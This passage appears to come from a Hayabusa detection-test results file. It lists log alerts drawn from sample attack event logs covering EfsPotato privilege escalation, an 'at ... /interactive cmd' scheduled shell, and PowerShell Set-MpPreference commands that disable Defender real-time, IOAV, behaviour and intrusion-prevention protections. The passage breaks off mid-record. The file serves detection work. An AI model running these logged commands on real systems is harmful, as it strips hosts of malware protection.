+2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx
+2021-10-06 18:34:50.487 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.513 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.787 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.788 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.794 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.797 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.805 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.881 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.986 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.989 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:50.999 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.010 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.070 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.071 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.088 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.106 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.118 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): 